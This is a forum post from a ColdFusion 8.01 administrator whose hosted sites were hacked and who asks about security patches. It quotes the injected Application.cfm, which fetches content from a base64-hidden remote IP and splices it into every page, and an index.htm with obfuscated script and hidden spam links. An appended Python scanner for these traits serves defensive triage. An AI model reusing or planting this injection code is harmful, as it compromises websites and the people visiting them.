39 Replies Latest reply on Sep 22, 2013 3:03 PM by Cenn Raven

    CF8.01 hacked.  Need info on patches


      Yesterday some of our hosted sites were hacked using code pasted below.  We're running CF 8.01 and I'm wondering if there is a cumulative security patch that we can apply or if I should just apply every security patch that I can find.  I noticed that this particular vulnerability was patched for CF9 and 10 about six weeks ago.


      Here's the hack:


      1. Application.cfm

      <cfif (FindNoCase("Archivver",http_user_agent) EQ 0)><cfsavecontent variable="paga"><CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">

      <cfset mmy = cfhttp.FileContent><cfoutput>




      <CFHTTP METHOD = "Get" URL = "#hSWaawe('aHR0cDovLzE5OS4xOS45NC4xOTQvY2ZzZXQyLnR4dA==')#">

      <cfset cfs = cfhttp.FileContent>

      <cfif (FindNoCase("</div>",paga) GT 0)>

      <cfset paga = replace(paga, "</div>", "</div>#cfs#", "one")>

      <cfelseif (FindNoCase("</table>",paga) GT 0)>

      <cfset paga = replace(paga, "</table>", "</table>#cfs#", "one")>

      <cfelseif (FindNoCase("</a>",paga) GT 0)>

      <cfset paga = replace(paga, "</a>", "</a>#cfs#", "one")>


      <cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>







      <cffunction name="hSWaawe"> 

      <cfargument name="HxzcGlk">

      <cfset Ypg = ToString(ToBinary(HxzcGlk))>

      <cfreturn Ypg>




      2. Index.htm





          <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.thehiltonorlando.com/">








            <a href="http://www.thehiltonorlando.com/">This page has moved.  Please click here if you are not automatically redirected in a moment...</a><script language="JavaScript">function zdrViewState()


      var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','99779188 90','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];




      t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}zdrViewState();





      <p class="zdroq">

      Most of the time, the borrower would <a href="http://www.paydayloans-online-uk.co.uk/" title="Payday">payday</a> be the one jeopardized. Applying to various payday loan sites could create suspicion to the lender <a href="http://payday-loans-fts.co.uk/" title="Payday Loans">payday loans</a> and this could make the approval process unnecessarily burdening. Having a checking account is also a <a href="http://best-rates-payday-loans.co.uk/" title="Http://best-rates-payday-loans.co.uk/">http://best-rates-payday-loans.co.uk/</a> must. They would also need this in order to withdraw money from your account when the payment is <a href="http://bad-credit-payday.co.uk/" title="Payday Loans Bad Credit">payday loans bad credit</a> due. In the long run, you would see that they have high interest rates that would be equivalent to wasting your <a href="http://payday-loans-eng.co.uk/" title="Payday Loans Uk">payday loans uk</a> money. </p>





      Thanks in advance.
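
      For triage on other hosted sites, the following is an added example (not part of the original post) of a Python check that flags the traits visible in the Application.cfm above: a cfhttp request back to the site's own URL, a cfhttp URL hidden in a base64 literal, a ToString(ToBinary()) decoder helper, and a replace() that appends content after a closing HTML tag. The function names, the sample text and the placeholder URL are assumptions constructed for the example, and the check assumes each tag sits on one line.

```python
import base64
import binascii
import re

# Constructed sample that mirrors the structure of the posted Application.cfm.
# The URL is a documentation-range placeholder, not a value from the post.
_B64 = base64.b64encode(b"http://203.0.113.5/inject.txt").decode()
SAMPLE = f'''<cfif (FindNoCase("Archivver",http_user_agent) EQ 0)>
<CFHTTP METHOD = "Get" URL = "http://#SERVER_NAME##SCRIPT_NAME#?#QUERY_STRING#" userAgent = "Archivver">
<CFHTTP METHOD = "Get" URL = "#xDec('{_B64}')#">
<cfset paga = replace(paga, "</body>", "#cfs#</body>", "one")>
<cffunction name="xDec"><cfargument name="a">
<cfset r = ToString(ToBinary(a))><cfreturn r></cffunction>'''

CFHTTP_URL = re.compile(r'<cfhttp\b[^>]*?\burl\s*=\s*"([^"]*)"', re.I)
B64_LITERAL = re.compile(r"""\(\s*['"]([A-Za-z0-9+/]{16,}={0,2})['"]\s*\)""")
SELF_FETCH = re.compile(r"#\s*(?:cgi\.)?server_name\s*#", re.I)
B64_HELPER = re.compile(r"ToString\s*\(\s*ToBinary\s*\(", re.I)
TAG_REWRITE = re.compile(r'replace\s*\([^)]*"</(?:div|table|a|body)>"', re.I)

def decode_literal(b64):
    """Return the decoded text of a base64 literal, or None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan_cfml(text):
    """Return (line number, finding kind, detail) tuples for one CFML file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for url in CFHTTP_URL.findall(line):
            if SELF_FETCH.search(url):  # page fetches itself to capture output
                findings.append((lineno, "cfhttp-self-request", url))
            for literal in B64_LITERAL.findall(url):  # hidden remote URL
                decoded = decode_literal(literal)
                if decoded and decoded.lower().startswith(("http://", "https://")):
                    findings.append((lineno, "cfhttp-base64-url", decoded))
        if TAG_REWRITE.search(line):  # content appended after a closing tag
            findings.append((lineno, "html-append-rewrite", line.strip()))
        if B64_HELPER.search(line):  # wrapper that decodes base64 at runtime
            findings.append((lineno, "base64-decoder-helper", line.strip()))
    return findings

if __name__ == "__main__":
    for finding in scan_cfml(SAMPLE):
        print(finding)
```

      Any one finding can occur in legitimate code; the combination in a single Application.cfm is what matches the sample in this post.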


